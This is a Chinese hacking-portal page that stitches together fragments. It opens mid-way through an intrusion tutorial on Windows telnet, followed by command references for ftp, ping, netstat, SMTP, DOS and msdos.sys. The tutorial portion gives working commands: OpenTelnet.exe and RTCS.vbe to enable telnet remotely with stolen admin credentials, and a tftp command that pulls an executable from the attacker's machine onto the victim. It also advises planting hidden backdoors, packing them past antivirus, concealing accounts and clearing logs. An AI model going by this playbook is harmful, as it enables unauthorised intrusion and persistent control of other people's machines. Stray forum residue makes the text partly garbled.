极限搜索：

您现在位置:主页>黑客天下>

命令大全

来源: 2008-4-18 07:53:48 网友评论 0 条字体:[大中小] 我要投稿!

Telnet Server Build 5.00.99201.1
login:
password:
\\为0时不使用NTML身份验证，直接输入用户名和密码，比如你可以输入扫到的Administrator和5678 字串6

2)身份验证选项=1时
=====================================
NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\先尝试 NTLM 身份验证，如果失败，再使用用户名和密码，其实这种方式对于我们来说，与上一种方式没什么区别字串7

3)身份验证选项=2时
=====================================
NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password
Server allows NTLM authentication only
Server has closed connection
遗失对主机的连接。
C:\>
\\仔细看看上面的显示，根本没有给你输入用户名和密码的机会，直接断开连接，扫到了密码也是白扫
所以对于入侵者来说，NTLM是横在我们面前的一座大山，必须要除掉它，一般我们有如下几种方法：
1通过修改远程注册表更改telnet服务器配置，将验证方式从2改为1或0；
2使用NTLM.exe，上传后直接运行，可将telnet服务器验证方式从2改为1；
3在本地建立扫描到的用户，以此用户身份开启telnet客户机并进行远程登录；
4使用软件，比如opentelnet.exe（需要管理员权限且开启IPC管道）
5使用脚本，如RTCS，（需要管理员权限但不依赖IPC管道）
基本上是以上的5种，其中后两种是我们比较常用的开telnet的手法，而且使用方法十分简单，命令如下：
OpenTelnet.exe \\server username password NTLMAuthor telnetport

字串1

OpenTelnet.exe \\服务器地址管理员用户名密码验证方式（填0或1） telnet端口
cscript RTCS.vbe targetIP username password NTLMAuthor telnetport
cscript RTCS.vbe <目标IP> <管理员用户名> <密码> <验证方式> <tlnet端口>

字串7

五在telnet中该做什么字串7

本来写到上面就想结束了，不过许多朋友都说telnet上去后不知道该做什么了，既然这样，那我就抛砖引玉吧，这次不讲具体做法，只是说说思路，什么？为什么不讲具体做法？篇幅不够嘛，以后我会一一解释的。

字串9

1 查看系统信息

字串5

呵呵，其实就是随处看看，看看他的系统配置和版本（用type c:\boot.ini来知道pro版或server版），看看都装了什么服务或软件（从目录名就可以知道了），看看有什么重要或有趣的文件啦（唉，要是国外的机器，看也看不懂），看看他的用户情况，总之就是尽可能多的了解系统，为一会装后门摸底。字串8

2 使用tftp传送文件字串6

想必大家都遇到过在telnet中传输文件的问题，因为我们习惯了在ipc管道中的文件传输，所以有些朋友喜欢用net share ipc$ 来打开管道，进而利用copy来传输文件。不过这样反而麻烦，既然我们已经得到了shell，我们可以用TFPT命令来完成这一切，什么是TFTP呢？字串8

用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输，一般是使用Windows自带的tftp.exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的：首先运行本地的TFTP Server（比如tftpd32.exe）软件并保证始终开启直至传输全部完成，然后在telnet中（当然你也可以在其他shell中）运行下面的命令：
C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe
其中ip为你自己机器的ip，且上传文件要与TFTP服务器端在同一目录下，这样你就可以把xinxin.exe上传到c盘abc目录下了（其实是从tftp服务器下载来的）
需要指出的是，如果使用代理IP，你将不能实现与外部网络的文件传送。因为你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中，代替你的内部网络地址，所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。字串2

3 安置后门

字串7

安置后门放在第二步好像早了点，如果你入侵还有其他目的，比如以破坏为主，或者是来修改主页的，那么这些事情当然可以在安置后门之前做；如果你只是想得到一只肉鸡，那就没什么可说的了，安后门吧。
后门的种类繁多，也给我们提供了很大的选择余地，能够根据具体情况选择合适的后门的确是一门学问。常用的后门一般有：木马，asp木马，远程控制软件，克隆帐户，建立并隐藏帐户，telnet，telnet扩展的shell，终端服务等。安置一个好的后门通常要注意以下几点：
1 不会被防火墙查杀及阻碍通信：被加入病毒库的后门最好加壳以逃过防火墙，尽量用低端口通信，以免被防火墙屏蔽。
2 最大限度增加隐蔽性：如果你选择远程控制软件，要注意被控端的安装提示和小图标，以及是否同步画面；如果你在帐户上做文章，要尽量保持在cmd和用户管理中都不出破绽；如果你选择放木马或telnet扩展，要注意文件和进程的隐藏；如果新开了终端服务（入侵前并没有开），一定要该掉3389这个显眼的端口，且越低越好。
3 不要当管理员不存在：这是一个大忌，许多朋友在只有默认帐户的机器上建立类似'hacking'的管理员帐户，真是无知者无畏呀。所以安置后门的时候，想想管理员疏忽的地方会在哪里。字串1

4 打补丁

字串5

如果想独霸肉鸡，就要会打补丁，要知道对肉鸡的竞争是很激烈的。怎么打补丁呢？这个也要问？想想你是怎么进来的吧。算了，提示一下，除了修补大的漏洞以外（上传官方补丁并运行），也要注意它的共享，ipc$共享（最好都关闭），可疑端口，容易被利用的服务等。不过打补丁也要注意隐蔽性的，不要让管理员发现大的改动。字串3

5 清除日志字串2

可以手动或利用软件，如果不太会就去找相关教材吧，在这里我不详细介绍了。字串5

六结束语

字串5

文章的前部分主要说了一些原理性的东西，后部分则侧重于应用，写的多了难免会有些遗漏，如果你觉得哪里还需要补充，或者哪里不明白，请回帖告诉我哟！！字串8

ftp命令大全

字串9

FTP命令是Internet用户使用最频繁的命令之一,不论是在DOS还是UNIX*作
系统下使用FTP,都会遇到大量的FTP内部命令,熟悉并灵活应用FTP的内部命令,可
以大大方便使用者,对于现在拨号上网的用户，如果ISP提供了shell可以使用noh
up，那么ftp将是你最省钱的上download方式，
ftp的命令行格式为:ftp －v －d －i －n －g[主机名]　　
－v 显示远程服务器的所有响应信息。
－d 使用调试方式。　　
－n 限制ftp的自动登录,即不使用.netrc文件。
－g 取消全局文件名。字串8

ftp使用的内部命令如下(其中括号表示可选项):
　　 1.![cmd[args]在本地机中执行交互shell、exit回到ftp环境,如!ls＊.zip 。
　　 2.￥ macro－ame[args]执行宏定义macro－name。
　　 3.account[password]提供登录远程系统成功后访问系统资源所需的补充口令。
　　 4.appendlocal－file[remote－file]将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
　　 5.ascii 使用ascii类型传输方式。
　　 6.bell每个命令执行完毕后计算机响铃一次。
　　 7.bin使用二进制文件传输方式。
　　 8.bye退出ftp会话过程。
　　 9.case在使用mget时,将远程主机文件名中的大写转为小写字母。
　　 10.cd remote－dir 进入远程主机目录。
　　 11.cdup进入远程主机目录的父目录。
　　 12.chmod modefile－name将远程主机文件file－name的存取方式设置为mode,如chmod 777 a.out。
　　 13.close中断与远程服务器的ftp会话(与open对应)。
　　 14.cr使用asscii方式传输文件时,将回车换行转换为回行。
　　 15.delete remote－file删除远程主机文件。
　　 16.debug[debug－value]设置调试方式,显示发送至远程主机的每条命令,如debup3,若设为0,表示取消debug。

字串9

　　 17.dir[remote－dir][local－file]显示远程主机目录,并将结果存入local－file。
　　 18.disconnection同close。
　　 19.form format将文件传输方式设置为format,缺省为file方式。
　　 20.getremote－file[local－file]将远程主机的文件remote－file传至本地硬盘的local－file。
　　 21.glob设置mdelete、mget、mput的文件名扩展,缺省时不扩展文件名,同命令行的－g参数。
　　 22.hash每传输1024字节,显示一个hash符号(＃)。
　　 23.help[cmd]显示ftp内部命令cmd的帮助信息,如help get。
　　 24.idle[seconds]将远程服务器的休眠计时器设为[seconds]秒。
　　 25.image设置二进制传输方式(同binary)
　　 26.lcd[dir]将本地工作目录切换至dir。
　　 27.ls[remote－dir][local－file]显示远程目录remote－dir,并存入本地local－file。
　　 28.macdef macro－name定义一个宏,遇到macdef下的空行时,宏定义结束。
　 29.mdelete[remote－file]删除远程主机文件。
　　 30.mdir remote－files local－file与dir类似,但可指定多个远程文件,如mdir＊.o.＊. zipoutfile。
　　 31.mget remote－files传输多个远程文件。

字串3

　　 32.mkdir dir－name 在远程主机中建一目录。
　　 33.mls remote－file local－file同nlist,但可指定多个文件名。
　　 34.mode[mode－name]将文件传输方式设置为mode－name,缺省为stream方式。
　　 35.modtime file－name显示远程主机文件的最后修改时间。
　　 36.mput local－file将多个文件传输至远程主机。
　　 37.newerfile－name如果远程机中file－name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
　　 38.nlist[remote－dir][local－file]显示远程主机目录的文件清单,并存入本地硬盘的local－file。
　　 39.nmap[inpatternoutpattern]设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,
如nmap￥1.￥2.￥3[￥1,￥2].[￥2,￥3],则传输文件a1 .a2.a3时,文件名变为a1、a2，
该命令特别适用于远程主机为非U－NIX机的情况。
40.ntrans[inchars[outchars]设置文件名字符的翻译机制,如ntrans1R,则文件名LL L将变为RRR。
　　 41.open host[port]建立指定ftp服务器连接,可指定连接端口。　　
42.passive进入被动传输方式。
　　 43.prompt设置多个文件传输时的交互提示。
　　 44.proxyftp－cmd在次要控制连接中,执行一条ftp命令,该命令允许连接两个ftp服务器,以在两个服务器间传输文件。字串1
第一条ftp命令必须为open,以首先建立两个服务器间的连接。
　　 45.put local－file[remote－file]将本地文件local－file传送至远程主机。
　　 46.pwd显示远程主机的当前工作目录。
　　 47.quit同bye,退出ftp会话。
　　 48.quote arg1,arg2……将参数逐字发至远程ftp服务器,如quote syst。
　 49.recv remote－file[local－file]同get。
　　 50.regetremote－file[local－file]类似于get,但若local－file存在,则从上次传输中断处续传。
　　 51.rhelp[cmd－name]请求获得远程主机的帮助。
　　 52.rstatus[file－name]若未指定文件名,则显示远程主机的状态,否则显示文件状态。
　　 53.rename[from][to]更改远程主机文件名。　　
54.reset清除回答队列。
　　 55.restart marker从指定的标志marker处,重新开始get或put,如restart 130。
　　 56.rmdir dir－name删除远程主机目录。
　　 57.runique设置文件名唯一性存储,若文件存在,则在原文件后加后缀。
　　 58.send local－file[remote－file]同put。
　　 59.sendport设置PORT命令的使用。
　　 60.site arg1,arg2……将参数作为SITE命令逐字发送至远程ftp主机。

字串3

　　 61.size file－name显示远程主机文件大小,如site idle 7200。
　　 62.status显示当前ftp状态。
　　 63.struct[struct－name]将文件传输结构设置为struct－name,缺省时使用stream结构。
64.sunique将远程主机文件名存储设置为唯一(与runique对应)。
　　 65.system显示远程主机的*作系统类型。
　　 66.tenex将文件传输类型设置为TENEX机所需的类型。
　　 67.tick设置传输时的字节计数器。
　　 68.trace设置包跟踪。
　　 69.type[type－name]设置文件传输类型为type－name,缺省为ascii,如typebinary,设置二进制传输方式。
　　 70.umask[newmask]将远程服务器的缺省umask设置为newmask,如umask 3。
71.useruser－name[password][account]向远程主机表明自己的身份,需要口令时,必须输入口令,如user anonymous my@email。
　　 72.verbose同命令行的－v参数,即设置详尽报告方式,ftp服务器的所有响应都将显示给用户,缺省为on.
　　 73.?[cmd]同help。
　　那么如何应用这些命令提高效率呢？下面我举一个例子，如何利用fttp进行
后台下载，假设你的ISP给你提供了shell并且可以用nohup，你想由fttp.downlo 字串8
ad.com/pub/internet/下载一个30M的程序aaa.zip具体步骤如下：
1.用notepad做一个文件如aaa1内容如下
　　 open ftp.dwonload.com user an onymous zyz@cenpok.net
cd /pub/internet/ i get aaa.zip close bye
2.拨号登录到你的ISP上。
用telnet 或netterm登录到shell，一般都在你的home子目录里bbs～/
3.用fttp上传aaa1到ISP服务器你的子目录。　　　　
4. 执行nohup fttp －invd aaa2＆这样这个进程就被放在ISP服务器的后台进行了，
如果你想知道情况如何，可以more aaa2就可以知道情况如何了。这时你可以断线了或干点别的，
估计时间到了(time约=30M/(33.6K/9)s)拨号上去，more aaa2如果显示成功下载aaa.zip,
就表示aaa.zip已经被下载到ISP的服务器上了，你再由ISP的服务器拉回来就相当与点对点了,
记得下载完成后del掉你的文件(aaa.zip)，免得浪费ISP资源，它会关掉shell的。
ping参数

字串7

-a 将目标的机器标识转换为ip地址
-t 若使用者不人为中断会不断的ping下去
-c count 要求ping命令连续发送数据包，直到发出并接收到count个请求
-d 为使用的套接字打开调试状态
-f 是一种快速方式ping。使得ping输出数据包的速度和数据包从远程主机返回一样快，或者更快，达到每秒100次。在这种方式下，每个请求用一个句点表示。对于每一个响应打印一个空格键。
-i seconds 在两次数据包发送之间间隔一定的秒数。不能同-f一起使用。
-n 只使用数字方式。在一般情况下ping会试图把IP地址转换成主机名。这个选项要求ping打印IP地址而不去查找用符号表示的名字。如果由于某种原因无法使用本地DNS服务器这个选项就很重要了。
-p pattern 拥护可以通过这个选项标识16 pad字节，把这些字节加入数据包中。当在网络中诊断与数据有关的错误时这个选项就非常有用。
-q 使ping只在开始和结束时打印一些概要信息。
-R 把ICMP RECORD-ROUTE选项加入到ECHO_REQUEST数据包中，要求在数据包中记录路由，这样当数据返回时ping就可以把路由信息打印出来。每个数据包只能记录9个路由节点。许多主机忽略或者放弃这个选项。
-r 使ping命令旁路掉用于发送数据包的正常路由表。

字串9

-s packetsize 使用户能够标识出要发送数据的字节数。缺省是56个字符，再加上8个字节的ICMP数据头，共64个ICMP数据字节。
-v 使ping处于verbose方式。它要ping命令除了打印ECHO-RESPONSE数据包之外，还打印其它所有返回的ICMP数据包。

字串6

I like to disappear in the crowd, just as a drop of water that falls into the sea.So my name is iwater,if u can tell me out,please come on,or go on. 字串3

字串2

头衔：CEH050114 字串5

iWater 字串9

荣誉：影子鹰核心成员
职务：论坛版主
威望：＋3
级别：大侠
鹰币：103
经验：975
文章：113
注册：03-10-02 09:07 字串9

发表: 2003-10-19 08:45:42 第7楼
netstat参数

字串6

-A 显示任何关联的协议控制块的地址。主要用于调试
-a 显示所有套接字的状态。在一般情况下不显示与服务器进程相关联的套接字
-i 显示自动配置接口的状态。那些在系统初始引导后配置的接口状态不在输出之列
-m 打印网络存储器的使用情况
-n 打印实际地址，而不是对地址的解释或者显示主机，网络名之类的符号
-r 打印路由选择表
-f address -family对于给出名字的地址簇打印统计数字和控制块信息。到目前为止，唯一支持的地址簇是inet
-I interface 只打印给出名字的接口状态
-p protocol-name 只打印给出名字的协议的统计数字和协议控制块信息
-s 打印每个协议的统计数字
-t 在输出显示中用时间信息代替队列长度信息。
netstat命令的列标题
Name 接口的名字
Mtu 接口的最大传输单位
Net/Dest 接口所在的网络
Address 接口的IP地址
Ipkts 接收到的数据包数目
Ierrs 接收到时已损坏的数据包数目
Opkts 发送的数据包数目
Oeers 发送时已损坏的数据包数目
Collisions 由这个接口所记录的网络冲突数目
SMTP命令集字串3

SMTP协议原始命令码和工作原理

字串4

1.SMTP是工作在两种情况下：一是电子邮件从客户机传输到服务器；二是从某一个服务器传输到另一个服务器.
2.SMTP是个请求/响应协议，命令和响应都是基于ASCII文本，并以CR和LF符结束。响应包括一个表示返回状态的三位数字代码.
3.SMTP在TCP协议25号端口****连接请求
4.连接和发送过程：
a.建立TCP连接
b.客户端发送HELO命令以标识发件人自己的身份，然后客户端发送MAIL命令
服务器端正希望以OK作为响应，表明准备接收
c.客户端发送RCPT命令，以标识该电子邮件的计划接收人，可以有多个RCPT行
服务器端则表示是否愿意为收件人接受邮件
d.协商结束，发送邮件，用命令DATA发送
e. 以.表示结束输入内容一起发送出去
f.结束此次发送，用QUIT命令退出。字串9

5.另外两个命令：
VRFY---用于验证给定的用户邮箱是否存在，以及接收关于该用户的详细信息。
EXPN---用于扩充邮件列表。
6.邮件路由过程：
SMTP服务器基于‘域名服务DNS中计划收件人的域名来路由电子邮件。SMTP服务器基于DNS中的MX记录来路由电子邮件，MX记录注册了域名和相关的SMTP中继主机，属于该域的电子邮件都应向该主机发送。
若SMTP服务器mail.abc.com收到一封信要发到shuser@sh.abc.com:
a.Sendmail请求DNS给出主机sh.abc.com的CNAME记录，如有，假若CNAME到shmail.abc.com，则再次请求shmail.abc.com的CNAME记录，直到没有为止.
b.假定被CNAME到shmail.abc.com,然后sendmail请求@abc.com域的DNS给出shmail.abc.com的MX记录，
shmail MX 5 shmail.abc.com
10 shmail2.abc.com
c. Sendmail最后请求DNS给出shmail.abc.com的A记录，即IP地址，若返回值为1.2.3.4
d. Sendmail与1.2.3.4连接，传送这封给shuser@sh.abc.com的信到1.2.3.4这台服务器的SMTP后台程序
7.SMTP基本命令集：
命令描述
------------------------------

字串2

HELO 向服务器标识用户身份
发送者能欺骗，说谎，但一般情况下服务器都能检测到。
MAIL 初始化邮件传输
mail from:
RCPT 标识单个的邮件接收人；常在MAIL命令后面
可有多个rcpt to:
DATA 在单个或多个RCPT命令后，表示所有的邮件接收人已标识，并初始化数据传输，以.结束。
VRFY 用于验证指定的用户/邮箱是否存在；由于安全方面的原因，服务器常禁止此命令
EXPN 验证给定的邮箱列表是否存在，扩充邮箱列表，也常被禁用
HELP 查询服务器支持什么命令
NOOP 无*作，服务器应响应OK
QUIT 结束会话
RSET 重置会话，当前传输被取消
--------------------------------
8. MAIL FROM命令中指定的地址是称作 envelope from地址，不需要和发送者自己的地址是一致的。
RCPT TO 与之等同，指明的接收者地址称为envelope to地址，而与实际的to：行是什么无关。
9.为什么没有RCPT CC和RCPT BCC:?
所有的接收者协商都通过RCPT TO命令来实现，如果是BCC，则协商发送后在对方接收时被删掉信封接收者
10.邮件被分为信封部分，信头部分和信体部分
envelope from, envelope to 与message from:, message to:完全不相干。字串1
evnelope是由服务器主机间SMTP后台提供的，而message from/to是由用户提供的。有无冒号也是区别。
11. 怎样由信封部分检查是否一封信是否是伪造的？
a. received行的关联性。
现在的SMTP邮件传输系统，在信封部分除了两端的内部主机处理的之个，考虑两个公司防火墙之间的部分，若两台防火墙机器分别为Ａ和Ｂ，但接收者检查信封received：行时发现经过了C.则是伪造的。
b. received：行中的主机和IP地址对是否对应如：
Receibed: from galangal.org (turmeric.com [104.128.23.115] by mail .bieberdorf.edu....
c. 被人手动添加在最后面的received行：
Received: from galangal.org ([104.128.23.115]) by mail .bieberdorf.edu (8.8.5)
Received: from lemongrass.org by galangal.org (8.7.3)
Received: from graprao.com by lemongrass.org (8.6.4)
DOS命令大全
ATTRIB 显示或更改文件属性。
BREAK 设置或清除扩展的 CTRL+C 检查。
CALL 从一个批处理程序中调用另一个批处理程序。
CD 显示当前目录的名称或更改当前目录。
CHCP 显示或设置当前的代码页编号。
CHDIR 显示当前目录的名称或更改当前目录。字串5
CHKDSK 检查磁盘并显示状态报告。
CLS 清除屏幕。
COMP 比较两个或两组文件的内容。
COPY 将一个或多个文件复制到其他位置。
DATE 显示或设置日期。
DEL 删除一个或多个文件。
DIR 显示某个目录下的文件列表和所有子目录。
DISKCOMP 比较两张软盘的内容。
DISKCOPY 将一张软盘的内容复制到另一张软盘。
DOSKEY 编辑命令? 校匦碌饔妹畈⒋唇ê辍?
ECHO 显示消息，打开或者关闭命令回显。
ERASE 删除一个或多个文件。
EXIT 退出 CMD.EXE 程序（命令解释程序）。
FC 比较两个或两组文件，并显示它们之间的差别。
FIND 在文件中搜索文字串。
FOR 在一组文件中对每个文件运行特定的命令。
FORMAT 格式化磁盘。
GOTO 让命令解释程序转到批处理程序中带标号的行。
HELP 提供命令的帮助信息。
IF 在批处理程序中执行条件处理。
KEYB 配置用于特定语言的键盘。
LABEL 创建、更改或删除磁盘卷标。
MD 创建目录。
MKDIR 创建目录。
MODE ! ;配置系统设备。
MORE 每次显示一屏输出结果。
MOVE 将一个或多个文件从一个目录移动到同一驱动器的另一目录。字串4
PATH 显示或设置可执行文件的搜索路径。
PAUSE 暂停执行批处理文件，并显示一条消息。
PRINT 打印文本文件。
PROMPT 更改命令提示符。
RD 删除目录。
REM 在批处理文件或 Config.sys 中加注释。
REN 重命名文件。
RENAME 重命名文件。
REPLACE 替换文件。
RESTORE 还原由 Backup 命令备份的文件。
RMDIR 删除目录。
SET 显示、设置或删除环境变量。
SHIFT 在批处理文件中改变可替换参数的位置。
SORT 对输入的数据进行排序。
SUBST 将驱动器名与路径关联。
TIME&n! bsp; 显示或设置系统时间。
TREE 显示驱动器或路径的图形化目录结构。
TYPE 显示文本文件的内容。
VER 显示版本信息。
VOL 显示磁盘的卷标和序列号。
XCOPY 复制文件和目录树。
MSDOS.SYS设置大全

字串8

大家都记得,在DOS时代有一个很重要的系统文件msdos.sys，其实在WIN9X里面也有一个msdos.sys，藏在C盘根目录下，去掉其隐藏和只读属性后，用任意文字编辑软件都可以打开它。
[Paths]
1、hostwinbootdrv
指windows的启动盘。一般在C盘，所以设为hostbootdrv=c
2、uninstalldir
大家都知道在重装系统时，windows会问你是否要备份windows的卸载文件，这就是设置卸载文件保存在哪个盘，默认为C盘，uninstalldir=c，如果安装时没有选择保存卸载信息，则此项没有意义。
3、winbootdir与windir
设置windows的系统文件安装在哪个盘的哪个目录下，默认为：
winbootdir=c:\windows
windir=c:\windows
[options]
1、autoscan
设置在启动windows时是否要自动执行磁盘扫描程序scandisk:
autoscan=0 不执行磁盘扫描程序
autoscan=1 上次关机为非正常关机或启动为非正常重启动时执行scandisk
autoscan=2 每次启动自动执行磁盘扫描程序
默认值 autoscan=0
2、bootdelay
这是设置开机时出现“Starting Windows…”这个信息的时间，默认为2秒。即
bootdelay=2（WIN98已不支持此参数）

字串6

3、bootsafe
设置是否一开机即强迫进入安全模式：
bootsafe=0 表示不进入
bootsafe=1 表示要进入
默认值：bootsafe=0
4、logo
设置开机时是否显示蓝天白云的画面：
logo=1 表示显示
logo=0 表示不显示
默认值：logo=1
5、bootgui
设置开机后是否进入图形接口模式：
bootgui=1 表示进入，即我们一般见到的windows画面
bootgui=1 表示不进入
默认值：bootgui=1
6、bootkeys
设置开机时，是否可以使用功能键（F4进入DOS6.22以前的版本，F5进入安全模式，F6进入安全模式并支持基本网络功能，F8则显示启动菜单）：
bootkeys=1 表示可以使用功能键
bootkeys=0 由上述功能键将被禁止
默认值：bootkeys=1
7、bootmenu
设置开机时是否显示如下启动菜单：
(1)Normal
(2)Logged(\bootlog.txt)
(3)Safe Mode
(4)Setp-by-step configration
(5)Command prompt only
(6)Safe mode command prompt only
(7)Previous version MS-DOS
bootmenu=0 表示不显示
bootmenu=1 表示显示
默认值：bootmenu=0
8、bootmenudefault 字串6
开机时如出现启动菜单时，设置启动菜单上的亮条指在哪一条上：
可选值为菜单项数
默认值：bootmenudefault=1
9、bootmenudelay
设置开机时出现的启动菜单要显示多久，默认为bootmenudelay=30，即显示30秒。
10、bootwarn
设置进入安全模式时是否显示报警信息：
bootwarn=0 表示不显示
bootwarn=1 表示显示
默认值 bootwarn=1
11、boublebuffer
设置如有使用SCSI接口，开启doublebuffer可以使传输速率加快，如没有SCSI接口，则此项设置没有用，0表示关闭，1表示开启，默认为doublebuffer=0。
12、dblspace
设置开机时是否加载dblspace.bin这个文件，0表示不要，1表示要，默认为dblspace=1，顺便提一下，dblspace.bin是使用doublespace压缩进的硬盘在windows下能正常使用的文件，如果硬盘没有用doublespace压缩过，可以设为0，可以缩短进入windows的时间。
13、drvspace
设置开机时是否自动加载drvspace.bin文件，0表示不要，1表示要，默认为drvspace=1，drvspace.bin是使用drivespace压缩过的硬盘在Windows下能正常使用的文件，如果硬盘没有用drivespace压缩过，可以设为0，可以缩短进入windows的时间。字串4
14、loadtop
设置是否要将command.com、drvspace.bin、dblspace.bin加载到传统640KB中较高的内存地址。0表示不加载，1表示加载，默认为loadtop=1。
15、bootwin
设置Windows是否为默认的*作系统。1表示是，0表示不是，默认为bootwin=1。
16、network
设置电脑装有网卡或相关的网络设备时，开机就可以连到网络，设为network=1，否则为0。默认为network=0。如network=1，在开机选择菜单上，会多出一条Safe mode with network suppor项目。
17、另外，msdos.sys文件里面有许多XXXXXXXX，那是为了防止文件小于1024KB时，遭到一些DOS杀毒程序的误杀而加的，最好不要删掉。字串6

上一篇：DOS完整教程DOS的概况
下一篇：一般入侵常用的命令

返回主站：极限资讯网首页

极限图文资讯

	几种关闭ipc$默认共享的方法		易建联状态回勇取11分7板雄鹿主		征服男人吧
	爱你爱到杀死......我自己		奥运火炬传递歌曲出炉		反弹了，你准备走还是留？